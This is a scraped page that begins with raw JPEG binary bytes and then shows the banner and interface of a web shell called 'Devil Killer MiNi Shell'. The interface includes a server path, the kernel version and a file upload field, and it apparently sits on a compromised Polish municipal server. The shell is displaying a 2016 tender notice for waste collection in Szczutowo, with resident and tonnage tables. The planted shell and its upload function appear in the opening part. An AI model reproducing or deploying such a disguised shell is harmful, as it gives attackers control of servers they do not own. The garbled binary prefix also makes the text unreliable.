JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161202/357236-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.szczutowo.nowybip.pl' target='_blank'>http://www.szczutowo.nowybip.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 357236 - 2016
              z dnia 2016-12-02 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Szczutowo: Odbiór i zagospodarowanie odpadów komunalnych  z terenu gm. Szczutowo od właścicieli nieruchomości,  na których zamieszkują mieszkańcy  oraz z terenów nieruchomości, na których znajdują się domki letniskowe i  inne nieruchomości wykorzystywane  na cele rekreacyjno- wypoczynkowe w Słupi<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Szczutowo, krajowy numer identyfikacyjny
              54838200000, ul.
              ul. Lipowa 
              ,
              09227  
              Szczutowo, woj.
              mazowieckie, państwo
              Polska, tel.
              024 2767167 w. 102, 107, e-mail
              przetargi@szczutowo.pl, faks
              024 2767196 w. 103.
              <br />
              Adres strony internetowej (URL): www.szczutowo.nowybip.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.szczutowo.nowybip.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.szczutowo.nowybip.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Urząd Gminy w Szczutowie, ul. Lipowa 5a,09-227 Szczutowo</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Odbiór i zagospodarowanie odpadów komunalnych  z terenu gm. Szczutowo od właścicieli nieruchomości,  na których zamieszkują mieszkańcy  oraz z terenów nieruchomości, na których znajdują się domki letniskowe i  inne nieruchomości wykorzystywane  na cele rekreacyjno- wypoczynkowe w Słupi<br /><b>Numer referencyjny: </b>RI.271.19.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Odbiór i zagospodarowanie odpadów komunalnych   z terenu gm. Szczutowo od właścicieli nieruchomości,  na których zamieszkują mieszkańcy  oraz z terenów nieruchomości, na których znajdują się domki letniskowe i  inne nieruchomości wykorzystywane  na cele rekreacyjno- wypoczynkowe w Słupi, w sposób zgodny z przepisami ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2016 r. poz. 250 z póź. zm.), zapisami Wojewódzkiego Planu Gospodarki Odpadami, przyjętego uchwałą Sejmiku Województwa Mazowieckiego nr 211/12 z dnia 22.10.2012 roku w sprawie uchwalenia Wojewódzkiego Planu Gospodarki Odpadami dla Mazowsza na lata 2012- 2017 z uwzględnieniem lat 2018-2023 z załącznikami oraz uchwałą nr 212/12 Sejmiku Województwa Mazowieckiego z 22 października 2012r. w sprawie wykonania Wojewódzkiego Planu Gospodarki Odpadami dla Mazowsza na lata 2012-2017 z uwzględnieniem lat 2018-2023 (Dz. Urz. Woj. Maz. z 2012 poz.7849 z późn. zm.), przepisami Regulaminu utrzymania czystości i porządku na terenie Gminy  Szczutowo, a także innymi przepisami prawa  w tym prawa  miejscowego, Ustawa z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013r. poz.21 z późn. zm.).

Wspólny Słownik Zamówień (CPV)
90511000-2
Usługi wywozu odpadów
90513100-7
Usługi wywozu odpadów pochodzących z gospodarstw domowych
90500000-2
Usługi związane z odpadami
90600000-3
Usługi sprzątania oraz sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane

4.1. Dane dotyczące Gminy Szczutowo  istotne z punktu widzenia zamówienia
4 .1.1 	Powierzchnia Gminy Szczutowo  wynosi 11 262  ha, z czego  ok. 25 % ogólnej powierzchni gminy zajmują obszary leśne.
4.1.2 Gmina  składa się 25 sołectw, 26 miejscowości. Łączna liczba osób objętych systemem gospodarowania odpadami komunalnymi  3295 osób. Osoby gromadzące odpady w sposób selektywny 75 %. Łączna liczba nieruchomości 1125. Wyposażenie nieruchomości w kompostownik  569 nieruchomości tj. ok. 50%. Powyższe informacje ustalono na podstawie złożonych deklaracji przez mieszkańców nieruchomości zamieszkałych  oraz na podstawie decyzji ustalających wymiar wydanych przez Wójta Gminy Szczutowo. Powyższe dane nie obejmują pensjonariuszy  Domu Pomocy Społecznej i Domu Dziecka  w Szczutowie.
Tabela 1
ODPADY KOMUNALNE
LP

MIEJSCOWOŚĆ

SEGRGOWANE

NIESEGREGOWANE









LICZBA OSÓB
LICZBA NIERUCHOMOŚCI
LICZBA KOMPOSTOWNIKÓW
LICZBA OSÓB
LICZBA NIERUCHOMOŚCI
LICZBA KOMPOSTOWNIKÓW
1.
AGNIESZKOWO
139
34
20
22
9
2
2.
BIAŁASY
88
28
10
79
25
13
3.
BLINNO
118
34
19
22
11
7
4.
BLIZNO
81
27
10
48
23
10
5.
CAŁOWNIA
43
13
6
8
5
1
6.
CISSE
95
25
16
24
11
3
7.
DĄBKOWA PAROWA
44
14
8
22
10
5
8.
DZIKI BÓR 
30
10
7
19
8
5
9.
GRABAL
76
20
10
30
13
5
10.
GRĄDY
55
16
4
6
3
-
11.
GORZEŃ 
53
12
10
6
2
1
12.
GÓJSK
323
121
66
106
49
16
13.
GUGOŁY
16
6
2
12
7
3
14.
JAŹWINY
19
9
5
16
6
1
15.
JÓZEFOWO
48
15
6
21
7
3
16.
KARLEWO
67
20
12
28
13
3
17.
ŁAZY
77
20
11
12
5
4
18.
MALUSZYN
89
21
12
26
12
3
19.
MODRZEWIE
33
11
8
10
5
4
20.
MIERZĘCIN 
74
23
16
22
9
1
21.
MOŚCISKA
113
33
18
18
8
5
22.
PODLESIE
179
45
28
43
16
14
23.
SŁUPIA 
81
26
18
24
13
6
24.
STARA WOLA 
115
31
20
28
11
7
25.
SZCZECHOWO
42
12
9
33
16
7
26.
SZCZUTOWO
406
140
69
106
62
20
SUMA 
2504
766
420
791
359
149












Tabela 2
20 03 01  Odpady zmieszane 
315,81
20 01 02 - Szkło
26,37
20 01 39  Tworzywa sztuczne
11,42
20 01 40  Metale 
0,44
20 02 01  Odpady ulegające biodegradacji
4,38
20 01 01  Papier tektura
0,65
20 03 99 - Odpady komunalne niewymienione w innych podgrupach
2,9
17 01 07  Zmieszane odpady z betonu, gruzu ceglanego, odpadowych materiałów ceramicznych i elem. wyposażenia inne niż wymieniaone 17 01 06
12,82
17 09 04  Zmieszane odpady z budowy, remontów i demontażu inne niż wymienione w 170901, 170902 i 170903)
 2,18

20 03 07  Odpady Wielkogabarytowe 
4,62
20 01 32  Przeterminowane leki
0,06
Ilość [mg] odebranych poszczególnych rodzajów odpadów w okresie od IV kwartału 2015 r.  do III kwartału 2016 r. 

Tabela 3
20 03 01  Niesegregowane (zmieszane) odpady komunalne 
44,07
15 01 01  Opakowania z paieru i tektury
0,65
15 01 02 - Opakowania z tworzyw sztucznych
2,64
15 01 04  Opakowania z metali
0,58
15 01 07  Opakowania ze szkła
2,61
Ilość [mg] odebranych poszczególnych rodzajów odpadów z terenu Słupi letniskowej w 2016r.

Na terenie gm. Szczutowo przeważa  zabudowa zagrodowa i  jednorodzinna. Występują  pojedyńcze przypadki  zabudowy  wielorodzinnej (3 budynki  w miejscowości Gójsk).

Wykonawca zobowiązany jest uwzględnić przy sporządzaniu oferty ewentualny  wzrost liczby nieruchomości, na których zamieszkują mieszkańcy w okresie realizacji przedmiotu zamówienia. 

4.2. Wymogi dotyczące zagospodarowania odebranych odpadów komunalnych
4.2.1.	Wykonawca jest zobowiązany do przekazywania odebranych  zmieszanych odpadów komunalnych oraz odpadów zielonych do regionalnej instalacji do przetwarzania odpadów komunalnych (RIPOK), wskazanej w Wojewódzkim planie gospodarki odpadami  dla Mazowsza  na lata 2012  2017 z uwzględnieniem lat 2018  2023 uchwalonego  Uchwałą Nr 211/12 Sejmiku Województwa Mazowieckiego z dnia 22 października 2012 r. w sprawie uchwalenia Wojewódzkiego Planu Gospodarki Odpadami dla Mazowsza na lata 2012-2017 z uwzględnieniem lat 2018-2023  z załącznikami oraz uchwałą nr 212/12 Sejmiku Województwa Mazowieckiego z 22 października 2012r. w sprawie wykonania Wojewódzkiego Planu Gospodarki Odpadami dla Mazowsza na lata 2012-2017 z uwzględnieniem lat 2018-2023 ((Dz. Urz. Woj. Maz. z 2012 poz.7849 z późn. zm.)        
        W przypadku, gdy  regionalne instalacje do przetwarzania odpadów komunalnych ulegną awarii lub nie będą mogły przyjmować odpadów z innych przyczyn, Wykonawca zobowiązany jest do przekazywania odebranych odpadów komunalnych do instalacji zastępczej.
4.2.2.	Wykonawca zobowiązany jest do przekazywania odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych, do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 18 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013 r., poz.21 z późn. zm.).
4.2.3. 	Wykonawca ma obowiązek zagospodarować zebrane odpady komunalne w sposób, który zapewni osiągnięcie określonych w Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w  sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami  niektórych  frakcji  odpadów  komunalnych  (Dz.U. z 2012 r., poz. 645), poziomów recyklingu, przygotowania do ponownego użycia i odzysku następujących frakcji odpadów: papier, metale, tworzywa sztuczne i szkło, inne niż niebezpieczne odpady budowlane i rozbiórkowe. 
W przypadku niewywiązania się z niniejszego obowiązku na Wykonawcę nałożona zostanie kara  umowna  określona w projekcie umowy z Wykonawcą  stanowiącym  załącznik  do SIWZ.
         Osiągane przez Wykonawcę poziomy recyklingu, przygotowania do ponownego użycia i odzysku ww. odpadów obliczane będą na podstawie wzorów zawartych w Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w  sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami  niektórych  frakcji  odpadów  komunalnych  (Dz.U. z 2012 r., poz. 645).

4.2.4. Wykonawca ma obowiązek zagospodarować zebrane odpady komunalne w sposób, który zapewni  ograniczenie masy odpadów komunalnych ulegających  biodegradacji  przekazywanych  do składania do poziomów określonych w Rozporządzeniu Ministra Środowiska  z dnia  25 maja  2012 r.  w sprawie  poziomów  ograniczenia masy odpadów  komunalnych ulegających  biodegradacji przekazywanych  do składowania oraz  sposobu obliczania poziomu ograniczania  masy tych odpadów (Dz.U. z 2012 r., poz.676).

Obliczenie poziomu  ograniczenia  masy  odpadów  komunalnych  ulegających  biodegradacji  przekazanych  do składowania  następowało będzie w sposób  określony w  Rozporządzeniu  Ministra Środowiska  z dnia  25 maja  2012 r.  w sprawie  poziomów  ograniczenia masy odpadów  komunalnych ulegających  biodegradacji przekazywanych  do składowania oraz  sposobu obliczania poziomu ograniczania  masy tych odpadów (Dz.U. z 2012 r., poz.676)           
4.2.5. Obliczenia oraz weryfikacja osiąganych przez Wykonawcę poziomów recyklingu, przygotowania do ponownego użycia i odzysku ww. odpadów oraz poziomu ograniczenia  masy  odpadów  komunalnych  ulegających  biodegradacji  przekazanych  do składowania   dokonywane będą na podstawie  sprawozdań, o których mowa w art. 9n ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach  oraz kart  przekazania  odpadu.

4.3. Rodzaje odpadów komunalnych odbieranych od właścicieli nieruchomości oraz sposób i częstotliwość ich odbierania

4.3.1.	Zamawiający wymaga, aby odpady komunalne odbierane były przez Wykonawcę w sposób następujący:
 1/   z nieruchomości  zamieszkałych   w sposób i z częstotliwością określoną w Tabeli 4.

Tabela 4
Rodzaj odbieranych odpadów
Sposób odbioru
Częstotliwość odbioru
komunalne odpady zmieszane
pojemniki  wystawione przed posesję 
1 raz w miesiącu 
tworzywa sztuczne                  opakowania wielomateriałowe i metale  

worki w kolorze żółtym  120l   wystawione przed posesje  (worki zapewnia Wykonawca)                             
w okresie od maja do września - 1 raz w miesiącu,  w pozostałym okresie roku  nie  rzadziej niż 1  raz  na dwa miesiące
- pierwszy odbiór  w styczniu 2017r.
papier, tektura 
worki w kolorze niebieskim 120l wystawione przed posesje (worki zapewnia Wykonawca)                                        
 nie rzadziej  niż 1 raz na  kwartał  - pierwszy odbiór  w styczniu 2017 r.
szkło
pojemniki/worki w kolorze  zielonym 120l wystawione przed posesje (worki zapewnia Wykonawca)                                       
w okresie od maja do września - 1 raz w miesiącu,  w pozostałym okresie roku  nie  rzadziej niż 1  raz  na dwa miesiące.
- pierwszy odbiór  w styczniu 2017 r.
 przeterminowane leki 
Pojemniki zlokalizowane w   Punktach aptecznych w Szczutowie  i w Gójsku
( pojemniki zapewnia  Wykonawca )
w każdym przypadku zapełnienia  kontenera  czasie 48 godzin od  telefonicznego zgłoszenia  zamawiającego
 przeterminowane  chemikalia

Kontenery  zlokalizowane  w  miejscu   selektywnej  zbiórki odpadów  komunalnych 
(PSZOK)
( kontenery   zapewnia  Wykonawca) 
w każdym przypadku zapełnienia  kontenera  czasie 48 godzin od  telefonicznego zgłoszenia  zamawiającego
 

meble i inne odpady wielkogabarytowe


odpady budowlane i rozbiórkowe


odpady zielone


  popiół 



2/ z nieruchomości, na których znajdują się domki letniskowe, lub innych nieruchomości wykorzystywanych na cele rekreacyjno - wypoczynkowe  w miejscowości Słupia  w sposób i z częstotliwością określoną w Tabeli 5.

Tabela 5
Rodzaj odbieranych odpadów
Sposób odbioru
Częstotliwość odbioru
komunalne odpady zmieszane

Kontenery  KP-7  szt 5 zlokalizowane  w  miejscach  wskazanych  przez Zamawiającego  
( kontenery   zapewnia  Wykonawca) 
W miesiącach :
1) lipiec i  sierpień  - odbiór co tydzień (w  poniedziałki);
2) maj,  czerwiec,  wrzesień, październik - 1 raz  w miesiącu w dniu  uzgodnionym z Zamawiającym.

tworzywa sztuczne, opakowania wielomateriałowe,       metal                   
Pojemniki   koloru  żółtego o poj.  2,5  m3  szt 5 zlokalizowane  w  miejscach  wskazanych  przez Zamawiającego  
( pojemniki  zapewnia  Wykonawca) 
W miesiącach : od maja do  października - 1 raz w miesiącu w dniu  uzgodnionym z Zamawiającym.
szkło
Pojemnik   koloru  zielonego  o pojemności  2,5  m3 szt 5  zlokalizowane  w  miejscach  wskazanych  przez Zamawiającego  
( pojemniki  zapewnia  Wykonawca) 
W miesiącach : od maja do  października - 1 raz w miesiącu w dniu  uzgodnionym z Zamawiającym.  

Zamawiający zastrzega  sobie prawo zmniejszenia  częstotliwości   odbioru  w/w frakcji w sytuacji  wolniejszego zapełniania  pojemników na odpady   lub  rezygnacji  z usługi w sytuacji  odstąpienia  od  objęcia   systemem odbioru odpadów  komunalnych  nieruchomości, na których znajdują się domki letniskowe lub innych nieruchomości wykorzystywanych na cele rekreacyjno - wypoczynkowe  w miejscowości Słupia.
	
4.3.2. 	Wykonawca jest zobowiązany do odbierania odpadów komunalnych: 
a) 	w sposób ciągły, nie zakłócający spoczynku nocnego;
b) 	w terminach wynikających z przyjętego harmonogramu odbioru;
c) 	niezależnie od warunków atmosferycznych ;
d)	pojazdami przystosowanymi do odbierania poszczególnych frakcji odpadów oraz umożliwiającymi odbieranie odpadów z  nieruchomości, zlokalizowanych w miejscach, do których dojazd jest utrudniony.
4.3.3. Wykonawca zobowiązany jest do:
      -  odbierania  wszystkich odpadów komunalnych  określonych w Tabeli 4  w każdej ilości wytworzonych na terenie wszystkich nieruchomości położonych w granicach administracyjnych Gminy Szczutowo, na których zamieszkują mieszkańcy, zgromadzonych w kontenerach, pojemnikach i workach spełniających  wymagania, określone w Regulaminie utrzymania czystości i porządku na terenie Gminy Szczutowo i niniejszej  SIWZ.
          -  odbierania  odpadów komunalnych   w  ilości  i częstotliwością  określoną  w Tabeli 5.  
          - odebrania w  miesiącu styczniu od  właścicieli  nieruchomości  zamieszkałych wszystkich  odpadów segregowanych zgromadzonych w  workach  oznaczonych nazwą aktualnego   wykonawcy usługi tj. firmy BŁYSK-BIS z Makowa Mazowieckiego.
	Informuję, iż Regulamin utrzymania czystości i porządku na terenie gminy Szczutowo jest w trakcie dostosowania do Rozporządzenia Ministra Środowiska w sprawie szczegółowego sposobu selektywnego zbierania wybranych frakcji (projekt z dnia 15 czerwca 2016r.), które wejdzie w życie w 2017r. Zmianie ulegną zapisy dotyczące barwy pojemników i worków przeznaczonych do zbierania selektywnego odpadów.
4.3.4   Wykonawca zobowiązuje się do  realizacji  tzw. reklamacji (nieodebrane z nieruchomości odpady zgodnie z harmonogramem) - w przeciągu 24 godzin od otrzymania zawiadomienia fax. lub e-mail od Zamawiającego. Załatwienie reklamacji należy niezwłocznie potwierdzić  faks nr (24) 276-71-96 wew. 107  lub e-mail: odpady@szczutowo.pl
4.3.5.	W celu zapewnienia osiągnięcia wymaganych poziomów recyklingu, przygotowania do ponownego użycia i odzysku wskazanych frakcji odpadów, Wykonawca zobowiązany jest do:	pozostawiania   na terenie  nieruchomości podczas  każdego odbioru selektywnie zebranych odpadów komunalnych nowych,  pustych worków, w ilości odpowiadającej liczbie odebranych worków, spełniających wymagania określone w Regulaminie utrzymania czystości i porządku na terenie Gminy Szczutowo. Worki winny być o pojemności określonej w punkcie 4.3.1.Tabela 4 z folii LDPE o grubość min. 60 mikronów. Worki muszą być oznaczone przez Wykonawcę informacją o rodzaju odpadów, które należy w nich gromadzić. Worki do selektywnej zbiórki muszą być oznaczone nazwą, adresem i numerem telefonu Wykonawcy. 
Pierwsza dostawa worków winna nastąpić  podczas odbioru odpadów  segregowanych  w miesiącu  styczniu.
     Koszt  dostarczenia  worków  należy  wkalkulować w  cenę ofertową przedmiotu zamówienia.

4.3.6 Wykonawca    zobowiązany jest do   wyposażenia  :
     a)  Punktów  Aptecznych zlokalizowanych w Szczutowie i Gójsku  w pojemniki  do  zbiórki   przeterminowanych  leków.
 b) miejsc do  selektywnej zbiórki  odpadów  komunalnych  wskazanych przez Zamawiającego w kontenery   do gromadzenia następujących frakcji  odpadów: 
- zlokalizowany w Bliznie: przeterminowane chemikalia, meble i inne odpady wielkogabarytowe, odpady budowlane i rozbiórkowe, popiół;
- zlokalizowany w Gójsku: odpady zielone, popiół;
- zlokalizowany w Szczutowie: odpady zielone.
       c) miejsc wskazanych przez Zamawiającego zlokalizowanych w  Słupi  w kontenery   do 
          gromadzenia następujących frakcji  odpadów:
         -  zmieszanych ,
          - tworzywa sztuczne, opakowania wielomateriałowe, metal,   
          - szkło.
Kontenery  muszą być oznaczone przez Wykonawcę informacją o rodzaju odpadów, które należy w nich gromadzić, nazwą, adresem i numerem telefonu Wykonawcy. 
Wielkość  kontenerów  winna być  dostosowana  do potrzeb. Wykonawca odpowiada  za stan  sanitarny i techniczny  kontenerów.  Pojemniki i kontenery będą własnością Wykonawcy usługi. 
Pojemniki i kontenery winny zostać dostarczone we wskazane przez Zamawiającego miejsce do dnia 1 stycznia 2017r. za wyjątkiem Słupi gdzie kontenery i pojemniki do odpadów selektywnych winny być rozstawione do dnia 1 maja 2017r.

